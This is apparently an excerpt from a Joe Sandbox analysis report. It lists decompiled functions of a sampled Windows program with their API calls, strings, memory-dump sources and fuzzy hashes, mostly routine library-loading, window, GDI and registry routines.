                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-212574377
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 39adaa992061ea415b724a34e3f195d2ac2f2f2bcdc0c79ba91dc79f0f5f7918
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e47ea2fb967bc5a05fa6d8d3c64fcba096cc564050e4d812c51f788cc71ed1ca
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39adaa992061ea415b724a34e3f195d2ac2f2f2bcdc0c79ba91dc79f0f5f7918
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF030B0D05300DFEB24DFB29CC372336959BA4316F14803B9A0D96267D278088CCE2C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0044C7EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-1050967733
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ca03f8450237969495d81090995d2e77d5b4462fea94ff8caee62dbd4a4d12fe
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5a6e329c062b47ae4ba9e11e7719f1ec1b45dd3e70fac445fdcae0b1af11dcb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca03f8450237969495d81090995d2e77d5b4462fea94ff8caee62dbd4a4d12fe
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F0FE70246305CAFB50BBB5FDC67223694E3A4B0AF18137BE40156192D7BC4444CF4C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00478B3C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 667068680-222143506
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 01ec4f011cdcf02bc2823bdc62d0ce7d0e1be1f03beeb802c6eb5433be4981a1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ade474bf949b7c868f23be577f60042bf37b8b7e1302e6d2b868e4e2d48ad49
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01ec4f011cdcf02bc2823bdc62d0ce7d0e1be1f03beeb802c6eb5433be4981a1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4C0E9F0AC1740EEAA00E7F15CDAD762558D514B34724943F754DAA193D97D58044A2C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041B518 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0041B58E
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                                                                                                                                                                                                                                                                                                  • 73ECE680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                                                                                                                                                                                                                                                                                                  • 73ECE680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: E680$A4620A480A570Focus
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2226671993-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045D3B0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-1580325520
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041BD9C Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: A4620MetricsSystem$A480A570
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4120540252-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041364C Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                                                                                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                                                                                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LongWindow$Prop
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3887896539-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047E264 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047E272
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$Long$Show
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3609083571-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 64a3e6c2176d4acc74ea6130292171d5cd043058eec335b926c35577e1896bc6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE010CB5651210ABE600D769DE41F66379CAB0D334F0503AAB959DF2E3C729EC009B49
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041B280 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                                                                                                                                                                                                                                                                                                  • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                                                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                                                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3527656728-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004556C4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
                                                                                                                                                                                                                                                                                                                                                                  • PendingFileRenameOperations2, xrefs: 00455770
                                                                                                                                                                                                                                                                                                                                                                  • WININIT.INI, xrefs: 004557D0
                                                                                                                                                                                                                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 00455740
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-2199428270
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b0f03f73917aa0242672cad5e2a3d57b897b97096b21a66ee5a5e8eec82a5f33
